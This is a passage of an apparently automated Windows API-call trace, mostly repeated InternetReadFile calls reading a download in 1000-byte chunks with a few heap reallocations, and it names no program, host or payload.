lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.304] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c95c70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c95c70*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.321] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c96058, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c96058*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.322] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c96440, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c96440*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.322] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c96828, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c96828*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.322] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c96c10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c96c10*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.322] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c96ff8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c96ff8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.322] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c973e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c973e0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.323] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c977c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c977c8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.323] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c97bb0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c97bb0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.323] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c97f98, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c97f98*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.323] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c98380, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c98380*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.323] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c98768, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c98768*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.323] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c98b50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c98b50*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.324] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c98f38, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c98f38*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.328] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c99320, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c99320*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.328] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c99708, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c99708*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.328] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6c99af0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x6c99af0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.328] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0xf000) returned 0x523a170 [0127.329] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c929a8 | out: hHeap=0x6c90000) returned 1 [0127.329] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52416a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52416a0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.329] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5241a88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5241a88*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.330] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5241e70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5241e70*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.330] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5242258, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5242258*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.330] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5242640, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5242640*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.330] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5242a28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5242a28*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.330] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5242e10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5242e10*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.331] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52431f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52431f8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.331] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52435e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52435e0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.331] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52439c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52439c8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.331] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5243db0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5243db0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.331] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5244198, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5244198*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.371] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5244580, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5244580*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.372] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5244968, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5244968*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.372] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5244d50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5244d50*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.373] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5245138, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5245138*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.373] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5245520, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5245520*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.373] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5245908, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5245908*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.373] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5245cf0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5245cf0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.373] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52460d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52460d8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.374] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52464c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52464c0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.374] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52468a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52468a8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.374] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5246c90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5246c90*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.374] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5247078, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5247078*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.375] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5247460, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5247460*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.375] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5247848, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5247848*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.375] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5247c30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5247c30*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.375] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5248018, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5248018*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.376] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5248400, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5248400*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.376] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52487e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52487e8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.376] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5248bd0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5248bd0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.376] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x16800) returned 0x5249178 [0127.377] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x523a170 | out: hHeap=0x6c90000) returned 1 [0127.377] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5257fc0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5257fc0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.378] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52583a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52583a8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.378] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5258790, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5258790*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.378] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5258b78, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5258b78*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.378] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5258f60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5258f60*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.378] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5259348, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5259348*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.378] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5259730, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5259730*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.379] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5259b18, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5259b18*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.379] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5259f00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5259f00*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.379] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525a2e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525a2e8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.379] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525a6d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525a6d0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.379] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525aab8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525aab8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.379] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525aea0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525aea0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.381] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525b288, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525b288*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.381] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525b670, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525b670*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.382] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525ba58, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525ba58*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.382] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525be40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525be40*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.382] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525c228, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525c228*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.382] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525c610, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525c610*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.382] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525c9f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525c9f8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.383] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525cde0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525cde0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.383] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525d1c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525d1c8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.383] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525d5b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525d5b0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.383] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525d998, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525d998*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.383] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525dd80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525dd80*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.383] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525e168, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525e168*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.384] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525e550, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525e550*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.384] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525e938, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525e938*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.384] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525ed20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525ed20*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.384] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525f108, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525f108*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.384] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525f4f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525f4f0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.384] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x1e000) returned 0x525f980 [0127.386] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x5249178 | out: hHeap=0x6c90000) returned 1 [0127.386] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52760e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52760e0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.386] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52764c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52764c8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.387] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52768b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52768b0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.387] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5276c98, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5276c98*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.387] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5277080, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5277080*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.387] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5277468, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5277468*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.387] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5277850, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5277850*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.388] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5277c38, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5277c38*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.388] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5278020, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5278020*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.388] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5278408, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5278408*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.420] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52787f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52787f0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.421] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5278bd8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5278bd8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.421] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5278fc0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5278fc0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.421] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52793a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52793a8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.422] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5279790, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5279790*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.422] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5279b78, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5279b78*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.422] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5279f60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5279f60*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.422] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x527a348, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x527a348*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.423] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x527a730, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x527a730*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.423] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x527ab18, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x527ab18*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.423] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x527af00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x527af00*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.423] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x527b2e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x527b2e8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.423] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x527b6d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x527b6d0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.423] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x527bab8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x527bab8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.423] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x527bea0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x527bea0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.424] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x527c288, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x527c288*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.424] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x527c670, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x527c670*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.424] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x527ca58, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: 